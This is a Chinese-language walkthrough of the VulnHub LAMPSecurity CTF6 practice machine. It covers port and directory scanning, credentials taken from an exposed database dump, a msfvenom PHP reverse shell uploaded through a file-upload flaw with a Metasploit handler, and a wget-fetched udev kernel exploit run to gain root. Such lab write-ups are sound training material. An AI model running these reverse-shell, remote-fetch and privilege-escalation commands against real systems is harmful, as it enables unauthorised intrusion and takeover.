CTF6靶机实战

文章目录

    • 总结
      • CTF6靶机下载地址
      • 环境搭建
      • 靶机实战
        • 信息收集
        • 漏洞查找
        • 漏洞利用
        • 提权
      • 摘抄

总结

  • 信息搜集,端口扫描,目录扫描,获取敏感目录和压缩包文件
  • 下载源代码,进行审计代码,得到数据库账号和密码(发现账号和密码,其实和敏感目录下的一样)
  • 敏感目录下,获取账号和密码(发现是主页的登陆账号密码)
  • 使用msf生成php反向shell,通过文件上传漏洞上传shell,并访问进行触发
  • 寻找Linux内核漏洞exp,提权root

CTF6靶机下载地址

https://download.vulnhub.com/lampsecurity/ctf6.zip

环境搭建

  • VMware15.5pro
  • 攻击机:kali(IP:192.168.232.128)
  • 解压缩下载的ctf6.zip,直接导入即可

CTF6靶机实战_第1张图片

靶机实战

信息收集

扫描靶机IP、靶机开放的端口

arp-scan -l
nmap -A -v -sS -sV -p- -T4 192.168.232.133
-A  全面系统检测、启用脚本检测、扫描等
-v  显示扫描过程
-sS  半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限。
-sV  探测端口服务版本
-P-   指定端口为所以端口
-T4   针对TCP端口禁止动态扫描延迟超过10ms

CTF6靶机实战_第2张图片

目录扫描

dirb http://192.168.232.133
nikto -h http://192.168.232.133
发现了phpmyadmin目录,有没有很开心

CTF6靶机实战_第3张图片

访问目录

http://192.168.232.133/sql/db.sql
http://192.168.232.133/docs

CTF6靶机实战_第4张图片
CTF6靶机实战_第5张图片

漏洞查找

登陆后台数据库


CTF6靶机实战_第6张图片
CTF6靶机实战_第7张图片

登陆root

CTF6靶机实战_第8张图片
CTF6靶机实战_第9张图片

访问80端,发现账号密码登陆

CTF6靶机实战_第10张图片
CTF6靶机实战_第11张图片
CTF6靶机实战_第12张图片

漏洞利用

msf生成php反弹shell,并利用存储XSS进行上传

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.232.128 LPORT=7777 -o shell.php

CTF6靶机实战_第13张图片
CTF6靶机实战_第14张图片

kali启动msfconsole,进行利用

msfconsole
use exploit/multi/handler 
set payload php/meterpreter_reverse_tcp
set lhost  192.168.232.128
set lport 7777
sessions -s 1
exploit
此时需要去页面访问一下刚才上传的shell.php,进行触发

CTF6靶机实战_第15张图片
CTF6靶机实战_第16张图片
CTF6靶机实战_第17张图片

提权

进入交互式shell

shell
python -c 'import pty;pty.spawn("/bin/bash")'

msf搜索系统版本的漏洞

searchsploit linux udev

下载攻击脚本

wget http://192.168.232.129/8478.sh
ls | grep 8478.sh

CTF6靶机实战_第18张图片
CTF6靶机实战_第19张图片

添加执行权限,执行脚本

dos2unix 8478.sh  将脚本从文本格式转换为 nuix 格式:
chmod +x 8478.sh  添加执行权限
ls -la 8478.sh 查看执行权限:
cat /proc/net/netlink 查看进程:
./8478.sh 568  利用 568 的一个进程:

CTF6靶机实战_第20张图片
CTF6靶机实战_第21张图片

摘抄


你不是被别人丢下的,
也不是为别人准备的;
一切自由生长,
自己种花自己开,
自己开错自己败;
时间吹落的,交给时间捡起来。


你可能感兴趣的:(靶机练习)